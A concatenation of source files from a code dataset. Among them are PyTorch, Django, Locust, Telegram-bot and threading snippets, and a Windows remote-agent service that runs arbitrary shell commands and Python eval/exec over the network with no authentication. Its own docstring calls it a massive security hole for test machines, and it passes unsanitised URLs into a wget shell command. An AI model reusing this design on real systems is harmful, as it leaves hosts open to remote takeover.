02-intermediate/lstm_network/main.py
|
kevin2018pg/pytorch-notes
|
4ba3827fccbf17ec446b2538186dd78dea3ecb50
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import torch
import torch.nn as nn
"""
输入3个句子,每个句子由5个单词构成,每个单词词向量10维
batch=3, seq_len=5, Embedding=10
"""
# 设置LSTM参数,词向量维数10,隐藏元维度20,2个LSTM隐藏层,双向LSTM
bilstm = nn.LSTM(input_size=10, hidden_size=20, num_layers=2, bidirectional=True)
# 如下表示输入句子
input = torch.randn(5, 3, 10)
# 初始化的隐藏元和记忆元,通常维度一样
h0 = torch.randn(4, 3, 20) # [bidirection*num_layers, batch_size, hidden_size]
c0 = torch.randn(4, 3, 20) # [bidirection*num_layers, batch_size, hidden_size]
# 这里有2层lstm,output是最后一层lstm的每个词向量对应隐藏层的输出,与层数无关,只与序列长度有关
output, (hn, cn) = bilstm(input, (h0, c0))
print("output shape:", output.shape) # shape:torch.Size([5,3,40]),[seq_len,batch_size,2*hidden_size]
print("hn shape:", hn.shape) # shape:torch.Size([4,3,20]),[bidirection*num_layers,batch_size,hidden_size]
print("cn shape:", cn.shape) # shape:torch.Size([4,3,20]),[bidirection*num_layers,batch_size,hidden_size]
# 将输出数据做一个二分类
output = output.permute(1, 0, 2) # torch.Size([3,5,40]),[batch_size,seq_len,2*hidden_size]
output = output.contiguous() # torch.view()前做了permute需要contiguous,因为view需要tensor在连续的内存
batch_size = output.size(0)
output = output.view(batch_size, -1) # torch.Size([3,200]),[batch_size,seq_len*2*hidden_size]
fully_connected = nn.Linear(200, 2)
output = fully_connected(output)
print(output.shape) # torch.Size([3,2]),[batch_size,class]
print(output)
| 41.121212
| 106
| 0.740604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,089
| 0.6604
|
49fd04fd3ec6534f06e8ff42c0869a4f70bf3dd5
| 1,484
|
py
|
Python
|
meiduo_mall/apps/meiduo_admin/views/order.py
|
zzZaida/meiduo_backend
|
c4f94ea7f9c47a08d3e37fb0ac2c1ec1dcf2c18b
|
[
"MIT"
] | null | null | null |
meiduo_mall/apps/meiduo_admin/views/order.py
|
zzZaida/meiduo_backend
|
c4f94ea7f9c47a08d3e37fb0ac2c1ec1dcf2c18b
|
[
"MIT"
] | null | null | null |
meiduo_mall/apps/meiduo_admin/views/order.py
|
zzZaida/meiduo_backend
|
c4f94ea7f9c47a08d3e37fb0ac2c1ec1dcf2c18b
|
[
"MIT"
] | null | null | null |
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from apps.meiduo_admin.serializers.order import OrderInfoSerializer
from apps.meiduo_admin.utils import PageNum
from apps.orders.models import OrderInfo
class OrderModelViewSet(ModelViewSet):
queryset = OrderInfo.objects.all()
serializer_class = OrderInfoSerializer
pagination_class = PageNum
def destroy(self, request, *args, **kwargs):
return Response({'msg': '妖怪,吃俺老孙一棒,敢删除我的数据!'})
@action(methods=['PUT'],detail=True)
def status(self,request,pk):
# 1.查询订单
try:
order=OrderInfo.objects.get(order_id=pk)
except OrderInfo.DoesNotExist:
from rest_framework import status
return Response(status=status.HTTP_400_BAD_REQUEST)
# order=self.get_object()
# 2.修改订单状态
order.status=request.data.get('status')
order.save()
#3.返回相应
return Response({
'order_id':pk,
'status':order.status
})
"""
GET
{
"order_id": "20190909155657000000003",
"create_time": "2019-09-09T15:56:57.524510+08:00",
"update_time": "2019-09-09T15:57:02.595491+08:00",
"total_count": 1,
"total_amount": "11.00",
"freight": "10.00",
"pay_method": 2,
"status": 1,
"user": 3,
"address": 4,
"goods":[{},{},{},{}]
}
"""
| 26.035088
| 67
| 0.623989
| 1,247
| 0.80869
| 0
| 0
| 566
| 0.367056
| 0
| 0
| 542
| 0.351492
|
49fd9dcc627b703550931ebd10aa32549f023644
| 29,587
|
py
|
Python
|
QA/pycopia/remote/windows_server.py
|
kdart/pycopia3
|
8a7c820f096245411eabbb72345e4f30a35988b6
|
[
"Apache-2.0"
] | 3
|
2018-11-26T15:00:20.000Z
|
2022-01-28T23:17:58.000Z
|
QA/pycopia/remote/windows_server.py
|
kdart/pycopia3
|
8a7c820f096245411eabbb72345e4f30a35988b6
|
[
"Apache-2.0"
] | null | null | null |
QA/pycopia/remote/windows_server.py
|
kdart/pycopia3
|
8a7c820f096245411eabbb72345e4f30a35988b6
|
[
"Apache-2.0"
] | 1
|
2018-11-26T15:00:21.000Z
|
2018-11-26T15:00:21.000Z
|
#!/usr/bin/python3.4
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""
Implements a Windows version of a client responder. This should run with the
native Python for Windows.
Install on a Windows server:
Place the following lines in c:\autoexec.bat::
PATH=%PATH%;C:\Python26;C:\Python26\Scripts
Now run (all on one line)::
C:\Python26>python.exe %PYTHONLIB%\site-packages\pycopia\remote\WindowsServer.py
--username DOMAIN\Administrator --password xxxxxxxx install
OR, for system process that can interact with console::
C:\Python26>python.exe %PYTHONLIB%\site-packages\pycopia\remote\WindowsServer.py
--interactive install
Note: if you get an error about an account not existing, you may need
to supply the username like this:
.\Administrator
If a username was supplied to run as, go to the Service Manger from the
Windows control panel, and perform the following.
- Select "Remote Agent Server" from the list. Right-clieck and select "properties".
- Select the "Log On" tab.
- Click the "This account:" radio button.
- Enter DOMAIN\Administrator in the account box (or something else appropriate).
- Enter the proper password (twice).
- Click "Apply". You should confirm a message saying user is
enabled to log in as a service.
- Click "General" tab.
- You may now start the service.
You may also need to disable the Windows firewall for this to function
properly. This service is a massive security hole, so only run it on
a throw-away test machine on an isolated network.
"""
import os, sys, shutil, errno
import threading
# Pycopia imports
from pycopia.aid import IF
from pycopia.anypath import cygwin2nt, nt2cygwin
from pycopia import shparser
# returnable objects
from pycopia.remote.WindowsObjects import ExitStatus
# Windows stuff
import msvcrt
import win32api
import win32file
import win32net
import win32process
import win32event
# constants
import pywintypes
import win32con
import win32netcon
# some constants that the API forgot...
USE_WILDCARD = -1
USE_DISKDEV = 0
USE_SPOOLDEV = 1
USE_CHARDEV = 2
USE_IPC = 3
def setConfig():
Pyro.config.PYRO_STORAGE = "C:\\tmp\\"
Pyro.config.PYRO_LOGFILE = "C:\\tmp\\agent_svc.log"
Pyro.config.PYRO_TRACELEVEL=3
Pyro.config.PYRO_USER_LOGFILE = "C:\\tmp\\agent_user.log"
Pyro.config.PYRO_USER_TRACELEVEL = 3
Pyro.config.PYRO_PORT = 7867 # don't conflict with cygwin Pyro
import Pyro
import Pyro.util
setConfig()
Log=Pyro.util.Log
import Pyro.core
import Pyro.naming
from Pyro.ext.BasicNTService import BasicNTService, getRegistryParameters
_EXIT = False
UserLog = Pyro.util.UserLogger()
# msg, warn, or error methods
class WindowsFile(file):
"""A file object with some extra methods that match those in UserFile
(which has Posix extensions)."""
def locking(self, mode, nbytes):
return msvcrt.locking(self.fileno(), mode, nbytes)
def __repr__(self):
return "WindowsFile(%r, %r)" % (self.name, self.mode)
def lock_exclusive(self, length, start=0, whence=0, nb=0):
"""Locking method compatible with Posix files."""
if nb:
mode = msvcrt.LK_NBLCK
else:
mode = msvcrt.LK_LOCK
orig = self.tell()
self.seek(start, whence)
try:
msvcrt.locking(self.fileno(), mode, length)
finally:
self.seek(orig)
lock = lock_exclusive
def unlock(self, length, start=0, whence=0):
"""Posix compatible unlock."""
orig = self.tell()
self.seek(start, whence)
try:
msvcrt.locking(self.fileno(), msvcrt.LK_UNLCK, length)
finally:
self.seek(orig)
def get_osfhandle(self):
return msvcrt.get_osfhandle(self.fileno())
split_command_line = shparser.get_command_splitter()
# quick hack ... Windows sucks. No signal handling or anything useful, so it has to be faked.
class WindowsProcess(object):
def __init__(self, cmdline, logfile=None, env=None, callback=None, merge=True, pwent=None, async=False):
self.deadchild = False
self.exitstatus = None
self.cmdline = cmdline
self._callback = callback
self._buf = ""
self._log = logfile
if merge:
self.child_stdin, self.child_stdout = os.popen2(cmdline, "t", -1)
self.child_stderr = None
else:
self.child_stdin, self.child_stdout, self.child_stderr = os.popen3(cmdline, "t", -1)
self.childpid, self.handle = self._scan_for_self()
# since the Python popenX functions do not provide the PID, it must be
# scanned for in this ugly manner. 8-(
def _scan_for_self(self):
win32api.Sleep(2000) # sleep to give time for process to be seen in system table.
basename = self.cmdline.split()[0]
pids = win32process.EnumProcesses()
if not pids:
UserLog.warn("WindowsProcess", "no pids", pids)
for pid in pids:
try:
handle = win32api.OpenProcess(
win32con.PROCESS_QUERY_INFORMATION | win32con.PROCESS_VM_READ,
pywintypes.FALSE, pid)
except pywintypes.error as err:
UserLog.warn("WindowsProcess", str(err))
continue
try:
modlist = win32process.EnumProcessModules(handle)
except pywintypes.error as err:
UserLog.warn("WindowsProcess",str(err))
continue
for mod in modlist:
mname = win32process.GetModuleFileNameEx(handle, mod)
if mname.find(basename) >= 0:
return int(pid), handle
raise WindowsError("could not find process for %r" % (basename,))
def write(self, data):
return self.child_stdin.write(data)
def kill(self):
handle = win32api.OpenProcess(
win32con.PROCESS_VM_READ | win32con.PROCESS_TERMINATE, pywintypes.FALSE, self.childpid)
win32process.TerminateProcess(handle, 3)
def read(self, amt=1048576):
bs = len(self._buf)
while bs < amt:
c = self._read(4096)
if not c:
break
self._buf += c
bs = len(self._buf)
data = self._buf[:amt]
self._buf = self._buf[amt:]
return data
def readerr(self, amt=-1):
if self.child_stderr:
return self.child_stderr.read(amt)
def _read(self, amt):
data = self.child_stdout.read(amt)
if self._log:
self._log.write(data)
return data
def close(self):
if win32process.GetExitCodeProcess(self.handle) == win32con.STILL_ACTIVE:
self.kill()
self.child_stdin.close()
self.child_stdin = None
if self.child_stderr:
self.child_stdin.close()
self.child_stdin = None
es = ExitStatus(self.cmdline, self.child_stdout.close())
if self.exitstatus is None:
self.exitstatus = es
self.child_stdout = None
self.dead()
return self.exitstatus
def poll(self):
es = win32process.GetExitCodeProcess(self.handle)
if es == win32con.STILL_ACTIVE:
return None
else:
self.exitstatus = ExitStatus(self.cmdline, es)
self.dead()
return self.exitstatus
# called when process determined to be daed
def dead(self):
if not self.deadchild:
self.deadchild = True
if self._callback:
self._callback(self)
# check if still running
def alive(self):
es = win32process.GetExitCodeProcess(self.handle)
if es == win32con.STILL_ACTIVE:
return True
else:
return False
# wait until finished
def wait(self):
# let python read until EOF for a wait
try:
self._buf += self.child_stdout.read()
self.close()
except: # closed file?
pass
return self.exitstatus
def status(self):
return self.exitstatus
def isdead(self):
return self.deadchild
# considered true if child alive, false if child dead
def __bool__(self):
return not self.deadchild
# A server that performs filer client operations. This mostly delegates to the
# os module. But some special methods are provided for common functions.
class Win32Agent(Pyro.core.SynchronizedObjBase):
def __init__(self):
Pyro.core.SynchronizedObjBase.__init__(self)
self._files = {}
self._procs = {}
self._dirstack = []
def platform(self):
return sys.platform
def whatami(self):
"""Return agent implementation (class name)."""
return self.__class__.__name__
# Since file objects are not pickle-able, a handle is returned. Use the
# handle for subsequent file operations on f* methods.
def fopen(self, fname, mode="r", bufsize=-1):
"Opens a file object and returns a handle to it."
fname = cygwin2nt(fname)
fo = WindowsFile(fname, mode, bufsize)
UserLog.msg("fopen", fname)
handle = fo.fileno()
self._files[handle] = fo
return handle
def CreateFile(self, fname, mode="r", bufsize=-1):
"Open a file the same way a File Directory migration engine would."
fname = cygwin2nt(fname)
UserLog.msg("CreateFile", fname)
if mode == "r":
wmode = win32file.GENERIC_READ
elif mode == "w":
wmode = win32file.GENERIC_WRITE
elif mode in ( 'r+', 'w+', 'a+'):
wmode = win32file.GENERIC_READ | win32file.GENERIC_WRITE
else:
raise ValueError("invalid file mode")
h = win32file.CreateFile(
fname, # CTSTR lpFileName,
wmode, # DWORD dwDesiredAccess,
win32file.FILE_SHARE_DELETE | win32file.FILE_SHARE_READ | win32file.FILE_SHARE_WRITE, # DWORD dwShareMode,
None, # LPSECURITY_ATTRIBUTES lpSecurityAttributes,
win32file.OPEN_EXISTING, # DWORD dwCreationDisposition,
win32file.FILE_ATTRIBUTE_NORMAL, # DWORD dwFlagsAndAttributes,
0, # HANDLE hTemplateFile
)
self._files[int(h)] = h
return int(h)
def fclose(self, handle):
"Closes a file object given the handle."
fo = self._files.get(handle, None)
if fo:
if type(fo) is WindowsFile:
fo.close()
del self._files[handle]
else:
fo.Close() # pyHANDLE from CreateFile
def fread(self, handle, amt=-1):
"Reads from the file object given the handle and amount to read."
fo = self._files.get(handle, None)
if fo:
if type(fo) is WindowsFile:
return fo.read(amt)
else:
return win32file.ReadFile(fo, amt, None)
def fwrite(self, handle, data):
"Writes to a file object given the handle."
fo = self._files.get(handle, None)
if fo:
if type(fo) is WindowsFile:
return fo.write(data)
else:
return win32file.WriteFile(fo, data, None)
def fsync(self, handle):
"fsync the file object."
fo = self._files.get(handle, None)
if fo:
fo.flush()
return os.fsync(fo.fileno())
def fseek(self, handle, pos, how=0):
"Seek in the file object."
fo = self._files.get(handle, None)
if fo:
if type(fo) is WindowsFile:
return fo.seek(pos, how)
else:
win32file.SetFilePointer(fo, pos, how)
def ftell(self, handle):
"Tell where the seek pointer is in the file object."
fo = self._files.get(handle, None)
if fo:
if type(fo) is WindowsFile:
return fo.tell()
def fflush(self, handle):
"""Flush the file object buffer."""
fo = self._files.get(handle, None)
if fo:
return fo.flush()
def fileno(self, handle):
"Return the file objects file descriptor."
fo = self._files.get(handle, None)
if fo:
return fo.fileno()
def get_handle_info(self, handle):
fo = self._files.get(handle, None)
if fo:
return repr(fo) # XXX
else:
return None
def flock(self, handle, length=0, start=0, whence=0, nonblocking=False):
"""Lock the file with the given range."""
fo = self._files.get(handle, None)
if fo:
return fo.lock_exclusive(length, start, whence, nonblocking)
def funlock(self, handle, length, start=0, whence=0):
fo = self._files.get(handle, None)
if fo:
fo.unlock(length, start, whence)
def flist(self):
return list(self._files.keys())
def unlink(self, path):
"Unlink (delete) the given file."
path = cygwin2nt(path)
return os.unlink(path)
def rename(self, src, dst):
"Rename file from src to dst."
src = cygwin2nt(src)
dst = cygwin2nt(dst)
return os.rename(src, dst)
# directory methods
def mkdir(self, path, mode=0o777):
"Make a directory."
path = cygwin2nt(path)
return os.mkdir(path, mode)
def makedirs(self, path, mode=0o777):
"Make a full path."
path = cygwin2nt(path)
return os.makedirs(path, mode)
def chdir(self, path):
path = cygwin2nt(path)
return os.chdir(path)
def rmdir(self, path):
"Delete a directory."
path = cygwin2nt(path)
return os.rmdir(path)
def getcwd(self):
return os.getcwd()
def getcwdu(self):
return os.getcwd()
def pushd(self, path=None):
self._dirstack.append(os.getcwd())
if path:
path = cygwin2nt(path)
os.chdir(path)
def popd(self):
try:
path = self._dirstack.pop()
except IndexError:
return None
else:
os.chdir(path)
return path
def listdir(self, path):
path = cygwin2nt(path)
return os.listdir(path)
ls = listdir
def listfiles(self, path):
path = cygwin2nt(path)
isfile = os.path.isfile
pjoin = os.path.join
rv = []
for fname in os.listdir(path):
if isfile(pjoin(path, fname)):
rv.append(nt2cygwin(fname))
return rv
def chmod(self, path, mode):
path = cygwin2nt(path)
return os.chmod(path, mode)
def chown(self, path, uid, gid):
path = cygwin2nt(path)
return os.chown(path, uid, gid)
def stat(self, path):
path = cygwin2nt(path)
return os.stat(path)
def statvfs(self, path):
path = cygwin2nt(path)
return os.statvfs(path)
# fd ops ruturn the file descript as handle (of course)
def open(self, fname, flags, mode=0o777):
fd = os.open(fname, mode)
return fd
def close(self, fd):
return os.close(fd)
def write(self, fd, data):
return os.write(fd, data)
def read(self, fd, n):
return os.read(fd, n)
# end fd ops
# shutil interface
def copyfile(self,src, dst):
return shutil.copyfile(src, dst)
def copymode(self, src, dst):
return shutil.copymode(src, dst)
def copystat(self, src, dst):
return shutil.copystat(src, dst)
def copy(self, src, dst):
return shutil.copy(src, dst)
def copy2(self, src, dst):
return shutil.copy2(src, dst)
def copytree(self, src, dst, symlinks=False):
return shutil.copytree(src, dst, symlinks)
def move(self, src, dst):
return win32file.MoveFile(str(src), str(dst))
def rmtree(self, path):
path = cygwin2nt(path)
for fname in os.listdir(path):
file_or_dir = os.path.join(path, fname)
if os.path.isdir(file_or_dir) and not os.path.islink(file_or_dir):
self.rmtree(file_or_dir) #it's a directory reucursive call to function again
else:
try:
os.remove(file_or_dir) #it's a file, delete it
except:
#probably failed because it is not a normal file
win32api.SetFileAttributes(file_or_dir, win32file.FILE_ATTRIBUTE_NORMAL)
os.remove(file_or_dir) #it's a file, delete it
os.rmdir(path) #delete the directory here
# os.path delegates
def exists(self, path):
path = cygwin2nt(path)
return os.path.exists(path)
def isabs(self, path):
path = cygwin2nt(path)
return os.path.isabs(path)
def isdir(self, path):
path = cygwin2nt(path)
return os.path.isdir(path)
def isfile(self, path):
path = cygwin2nt(path)
return os.path.isfile(path)
def islink(self, path):
path = cygwin2nt(path)
return os.path.islink(path)
def ismount(self, path):
path = cygwin2nt(path)
return os.path.ismount(path)
# process control, these calls are syncronous (they block)
def system(self, cmd):
UserLog.msg("system", cmd)
return os.system(cmd) # remember, stdout is on the server
def run(self, cmd, user=None):
if user is None:
return self.pipe(cmd)
else:
return self.run_as(cmd, user.name, user.passwd)
def run_async(self, cmd, user=None):
UserLog.msg("run_async", cmd, str(user))
proc = WindowsProcess(cmd, pwent=user)
self._procs[proc.childpid] = proc
return proc.childpid
def _get_process(self, pid):
return self._procs.get(pid, None)
def read_process(self, pid, N=-1):
proc = self._get_process(pid)
if proc:
return proc.read(N)
else:
return ''
def write_process(self, pid, data):
proc = self._get_process(pid)
if proc:
return proc.write(data)
def poll(self, pid):
"""Poll for async process. Returns exitstatus if done."""
try:
proc = self._procs[pid]
except KeyError:
return -errno.ENOENT
if proc.poll() is None:
return -errno.EAGAIN
else:
del self._procs[pid]
return proc.exitstatus
def waitpid(self, pid):
while True:
rv = self.poll(pid)
if rv == -errno.ENOENT:
return None
if rv == -errno.EAGAIN:
proc = self._procs[pid]
es = proc.wait()
del self._procs[pid]
return es
else: # already exited
del self._procs[pid]
return rv
def kill(self, pid):
"""Kills a process that was started by run_async."""
try:
proc = self._procs.pop(pid)
except KeyError:
return -errno.ENOENT
else:
proc.kill()
sts = proc.wait()
return sts
def killall(self):
rv = []
for pid in self._procs:
rv.append(self.kill(pid))
return rv
def plist(self):
return list(self._procs.keys())
def spawn(self, cmd, user=None, async=True):
# keep the "async" parameter for compatibility with the
# PosixServer.
if user:
cmd = ("runas /user:%s " % user) + cmd
UserLog.msg("spawn", cmd)
L = split_command_line(cmd)
pid = os.spawnv(os.P_DETACH, L[0], L)
return pid
def pipe(self, cmd):
UserLog.msg("pipe", cmd)
proc = os.popen(cmd, 'r')
text = proc.read()
sts = proc.close()
if sts is None:
sts = 0
return ExitStatus(cmd, sts), text
def python(self, snippet):
try:
code = compile(str(snippet) + '\n', '<WindowsServer>', 'eval')
rv = eval(code, globals(), vars(self))
except:
t, v, tb = sys.exc_info()
return '*** %s (%s)' % (t, v)
else:
return rv
def pyexec(self, snippet):
try:
code = compile(str(snippet) + '\n', '<WindowsServer>', 'exec')
exec(code, globals(), vars(self))
except:
t, v, tb = sys.exc_info()
return '*** %s (%s)' % (t, v)
else:
return
# method that exists just to check if everything is working
def alive(self):
return True
def suicide(self):
"Kill myself. The server manager will ressurect me. How nice."
global _EXIT
_EXIT = True
def clean(self):
self.chdir("C:\\tmp")
for f in self.flist():
try:
self.fclose(f)
except:
pass
for pid in self.plist():
try:
self.kill(pid)
except:
pass
def NetUseAdd(self, drive, share, username=None, domainname=None, password=None):
"""Calls Windows API to map a drive. Note that this does not automatically use DFS."""
ui2={}
ui2['local'] = "%s:" % drive[0].upper()
ui2['remote'] = str(share) # \\servername\sharename
ui2['asg_type'] = USE_DISKDEV
if username:
ui2['username'] = str(username)
if domainname:
ui2['domainname'] = str(domainname)
if password:
ui2['password'] = str(password)
return win32net.NetUseAdd(None,2,ui2)
def NetUseDelete(self, drive, forcelevel=0):
"""Remove a mapped drive."""
ui2 = win32net.NetUseGetInfo(None, "%s:" % drive[0].upper(), 2)
return win32net.NetUseDel(None, ui2['remote'], max(0, min(forcelevel, 3)))
#win32net.USE_NOFORCE
#win32net.USE_FORCE
#win32net.USE_LOTS_OF_FORCE
def net_use(self, drive, share, user=None, domainname=None, password=None):
"""Map a drive on a Windows client using the *net* command."""
cmd = "net use %s: %s %s" % (drive[0].upper(), share, IF(password, password, ""))
if user:
cmd += " /USER:%s%s" % (IF(domainname, "%s\\"%domainname, ""), user)
return self.pipe(cmd)
def net_use_delete(self, drive):
"""Unmap a drive on a Windows client using the *net* command."""
cmd = "net use %s: /delete /y" % (drive[0].upper(),)
return self.pipe(cmd)
def md5sums(self, path):
"""Reads the md5sums.txt file in path and returns the number of files
checked good, then number bad (failures), and a list of the failures."""
from pycopia import md5lib
failures = []
counter = Counter()
md5lib.check_md5sums(path, failures.append, counter)
return counter.good, counter.bad, failures
def _get_home(self):
try: # F&*#!&@ windows
HOME = os.environ['USERPROFILE']
except KeyError:
try:
HOME = os.path.join(os.environ["HOMEDRIVE"], os.environ["HOMEPATH"])
except KeyError:
HOME = "C:\\"
return HOME
def get_tarball(self, url):
self.pushd(self._get_home())
# the ncftpget will check if the file is current, will not download if not needed
exitstatus, out = self.pipe('wget -q "%s"' % (url,))
self.popd()
return exitstatus
def run_script(self, script):
"""Runs a script from a shell."""
name = os.path.join("c:\\", "tmp", "clnt%d.bat" % (os.getpid(),))
sfile = open(name, "w")
sfile.write(str(script))
sfile.write("\n") # just in case string has no newline at the end
sfile.close()
try:
sts, out = self.pipe(name)
finally:
os.unlink(name)
return ExitStatus("cmd.exe", sts), out
# for PosixServer duck typing
def mount(self, host, export, mountpoint):
"""Map a drive on a client. Same as mount on NFS. The mountpoint should
be a drive letter (without the colon). """
return self.net_use(mountpoint, r"\\%s\%s" % (host, export))
def umount(self, mountpoint):
"""Unmap a drive on a client."""
return self.net_use_delete(mountpoint)
def run_as(self, cmd, user, password):
cmd = 'runas /user:%s %s' % (user, cmd)
return self.pipe(cmd)
def get_short_pathname(self, path):
"""Get the short file name of path."""
path = cygwin2nt(path)
return win32api.GetShortPathName(path)
def win32(self, funcname, *args, **kwargs):
"""Generic interface to win32. Calls a win32api function by name."""
f = getattr(win32api, funcname)
return f(*args, **kwargs)
def hostname(self):
"""Returns the client hosts name."""
return win32api.GetComputerName()
# Windows file API interface
def CopyFile(self, src, dst):
src = cygwin2nt(src)
dst = cygwin2nt(dst)
return win32file.CopyFile(src, dst, 1)
def GetFileAttributes(self, name):
name = cygwin2nt(name)
return win32file.GetFileAttributes(name)
def GetFileAttributeFlags(self):
return {
"ARCHIVE":win32file.FILE_ATTRIBUTE_ARCHIVE,
"COMPRESSED":win32file.FILE_ATTRIBUTE_COMPRESSED,
"DIRECTORY":win32file.FILE_ATTRIBUTE_DIRECTORY,
"HIDDEN":win32file.FILE_ATTRIBUTE_HIDDEN,
"NORMAL":win32file.FILE_ATTRIBUTE_NORMAL,
"OFFLINE":win32file.FILE_ATTRIBUTE_OFFLINE,
"READONLY":win32file.FILE_ATTRIBUTE_READONLY,
"SYSTEM":win32file.FILE_ATTRIBUTE_SYSTEM,
"TEMPORARY":win32file.FILE_ATTRIBUTE_TEMPORARY,
}
def SetFileAttributes(self, name, flags):
name = cygwin2nt(name)
return win32file.SetFileAttributes(name, flags)
def add_share(self, pathname):
"""Create a new share on this server. A directory is also created. """
drive, sharename = os.path.split(pathname)
if not os.path.isdir(pathname):
os.mkdir(pathname)
shinfo={} # shinfo struct
shinfo['netname'] = sharename
shinfo['type'] = win32netcon.STYPE_DISKTREE
shinfo['remark'] = 'Testing share %s' % (sharename,)
shinfo['permissions'] = 0
shinfo['max_uses'] = -1
shinfo['current_uses'] = 0
shinfo['path'] = pathname
shinfo['passwd'] = ''
win32net.NetShareAdd(None,2,shinfo)
return sharename
def del_share(self, pathname):
"""Remove a share. Returns True if successful, False otherwise."""
drive, sharename = os.path.split(pathname)
try:
win32net.NetShareDel(None, sharename, 0)
except:
ex, val, tb = sys.exc_info()
UserLog.warn("del_share", str(ex), str(val))
return False
else:
return True
# md5sums callback for counting files
class Counter(object):
def __init__(self):
self.good = 0
self.bad = 0
def __call__(self, name, disp):
if disp:
self.good += 1
else:
self.bad += 1
######## main program #####
class AgentThread(threading.Thread):
""" Agent runs in this thread.
"""
def __init__(self, stopcallback):
threading.Thread.__init__(self)
Log.msg("Win32Agent", "initializing")
self._stopcallback = stopcallback
def run(self):
try:
run_server()
except Exception as x :
Log.error("NS daemon","COULD NOT START!!!",x)
raise SystemExit
self._stopcallback()
def run_server():
os.chdir(r"C:\tmp")
Pyro.core.initServer(banner=0, storageCheck=0)
ns=Pyro.naming.NameServerLocator().getNS()
daemon=Pyro.core.Daemon()
daemon.useNameServer(ns)
uri=daemon.connectPersistent(Win32Agent(),
"Agents.%s" % (win32api.GetComputerName().lower(),))
daemon.requestLoop(_checkexit)
daemon.shutdown()
def _checkexit():
global _EXIT
return not _EXIT
class RemoteAgentService(BasicNTService):
_svc_name_ = 'RemoteAgentService'
_svc_display_name_ = "Remote Agent Server"
_svc_description_ = 'Provides Windows remote control agent.'
def __init__(self, args):
super(RemoteAgentService, self).__init__(args)
if not os.path.isdir(Pyro.config.PYRO_STORAGE):
os.mkdir(Pyro.config.PYRO_STORAGE)
self._thread = AgentThread(self.SvcStop)
def _doRun(self):
self._thread.start()
def _doStop(self):
self._thread.join()
self._thread = None
if __name__ == '__main__':
RemoteAgentService.HandleCommandLine()
| 31.475532
| 119
| 0.590935
| 25,459
| 0.860479
| 0
| 0
| 0
| 0
| 0
| 0
| 7,034
| 0.23774
|
49fe4d073489d2871ae5e7fb65b3eed92cc792a4
| 372
|
py
|
Python
|
benchmark/info_locust.py
|
dmitryhd/avio
|
4e99c123de12a682f1ac1141899d670fbab81de6
|
[
"MIT"
] | 2
|
2018-05-28T14:15:00.000Z
|
2018-10-15T09:33:38.000Z
|
benchmark/info_locust.py
|
dmitryhd/avio
|
4e99c123de12a682f1ac1141899d670fbab81de6
|
[
"MIT"
] | null | null | null |
benchmark/info_locust.py
|
dmitryhd/avio
|
4e99c123de12a682f1ac1141899d670fbab81de6
|
[
"MIT"
] | null | null | null |
from locust import HttpLocust, TaskSet
def login(l):
l.client.post("/login", {"username": "ellen_key", "password": "education"})
def info(l):
l.client.get("/_info")
def profile(l):
l.client.get("/profile")
class UserBehavior(TaskSet):
tasks = {info: 1}
class WebsiteUser(HttpLocust):
task_set = UserBehavior
min_wait = 0
max_wait = 0
| 15.5
| 79
| 0.647849
| 142
| 0.38172
| 0
| 0
| 0
| 0
| 0
| 0
| 68
| 0.182796
|
b700ba706143879736399c02f81312c27b36379e
| 513
|
py
|
Python
|
userbot/plugins/funtxts.py
|
kumar451/CatUserbot
|
44fab853232fad163fee63565cc4f3e645596527
|
[
"MIT"
] | null | null | null |
userbot/plugins/funtxts.py
|
kumar451/CatUserbot
|
44fab853232fad163fee63565cc4f3e645596527
|
[
"MIT"
] | null | null | null |
userbot/plugins/funtxts.py
|
kumar451/CatUserbot
|
44fab853232fad163fee63565cc4f3e645596527
|
[
"MIT"
] | null | null | null |
import nekos
from ..utils import admin_cmd
@borg.on(admin_cmd(pattern = "tcat$"))
async def hmm(cat):
if cat.fwd_from:
return
reactcat = nekos.textcat()
await cat.edit(reactcat)
@borg.on(admin_cmd(pattern = "why$"))
async def hmm(cat):
if cat.fwd_from:
return
whycat = nekos.why()
await cat.edit(whycat)
@borg.on(admin_cmd(pattern = "fact$"))
async def hmm(cat):
if cat.fwd_from:
return
factcat = nekos.fact()
await cat.edit(factcat)
| 21.375
| 38
| 0.619883
| 0
| 0
| 0
| 0
| 456
| 0.888889
| 340
| 0.662768
| 20
| 0.038986
|
b700c7a198400a2306ffbc65c60b311d50ca469c
| 2,518
|
py
|
Python
|
tests/test_thread_python_exit.py
|
justengel/continuous_threading
|
33e109df22eee202774975a3a940fb15164e6a78
|
[
"MIT"
] | 7
|
2020-05-30T05:57:39.000Z
|
2022-03-05T06:09:26.000Z
|
tests/test_thread_python_exit.py
|
justengel/continuous_threading
|
33e109df22eee202774975a3a940fb15164e6a78
|
[
"MIT"
] | 2
|
2020-05-30T15:12:44.000Z
|
2020-10-06T12:54:41.000Z
|
tests/test_thread_python_exit.py
|
justengel/continuous_threading
|
33e109df22eee202774975a3a940fb15164e6a78
|
[
"MIT"
] | 1
|
2020-03-03T19:37:44.000Z
|
2020-03-03T19:37:44.000Z
|
import time
import continuous_threading
def test_thread():
class Thread(continuous_threading.Thread):
def _run(self, *args, **kwargs):
print('here')
th = Thread()
th.start()
time.sleep(0.1)
def test_continuous():
class CountingThread(continuous_threading.ContinuousThread):
def __init__(self):
super(CountingThread, self).__init__()
self.counter = 0
def _run(self):
self.counter += 1
th = CountingThread()
th.start()
time.sleep(0.1)
print('Iterations', th.counter)
def test_pausable():
class PausableCountingThread(continuous_threading.PausableThread):
def __init__(self):
super(PausableCountingThread, self).__init__()
self.counter = 0
def _run(self):
self.counter += 1
th = PausableCountingThread()
th.start()
time.sleep(0.1)
th.stop()
print('Iterations (paused)', th.counter)
th.start()
time.sleep(0.1)
print('Iterations', th.counter)
def test_operation():
class SetValueThread(continuous_threading.OperationThread):
def __init__(self):
super(SetValueThread, self).__init__()
self.value = 0
def _run(self, data, *args, **kwargs):
self.value = data
th = SetValueThread()
th.start()
time.sleep(0.1)
assert th.value == 0
th.add_data(1)
time.sleep(0.1)
assert th.value == 1
